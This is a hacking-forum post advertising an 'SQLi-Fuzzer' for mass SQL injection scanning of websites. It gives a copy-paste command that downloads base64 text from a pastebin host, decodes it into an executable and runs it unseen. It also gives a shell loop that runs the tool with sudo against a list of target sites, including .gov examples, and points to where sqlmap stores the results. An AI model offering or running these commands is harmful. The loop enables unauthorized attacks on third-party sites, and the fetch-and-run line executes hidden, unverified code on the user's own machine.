• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

SQLi-Fuzzer

Status
Not open for further replies.

bash818

Exploits Coder
User
Joined
Feb 17, 2018
Messages
106
Reputation
0
Reaction score
244
Points
63
Credits
0
‎7 Years of Service‎
36%
Code:
>
	curl -s http://ix.io/1ea3 | base64 -d  > L23 && chmod +x L23 && ./L23

Copy and paste into your terminal. Drop it into the same directory where "sqlmap-dev/sqlmap.py" is located

for me its in "/opt/"....

Usage is simple, ./L23 <target>

If you want to run against list of targets make sure theyre  one line each

site.com

site.net

site.gov

etc...

run with this

Code:
>
	for x in $(cat YOURTARGETS.txt); do sudo bash L23 $x; wait; done;

I let this run against a list of sites and check on results later in >>> "cat ~/.sqlmap/output/<targetSite>/log"

 
Status
Not open for further replies.
Back
Top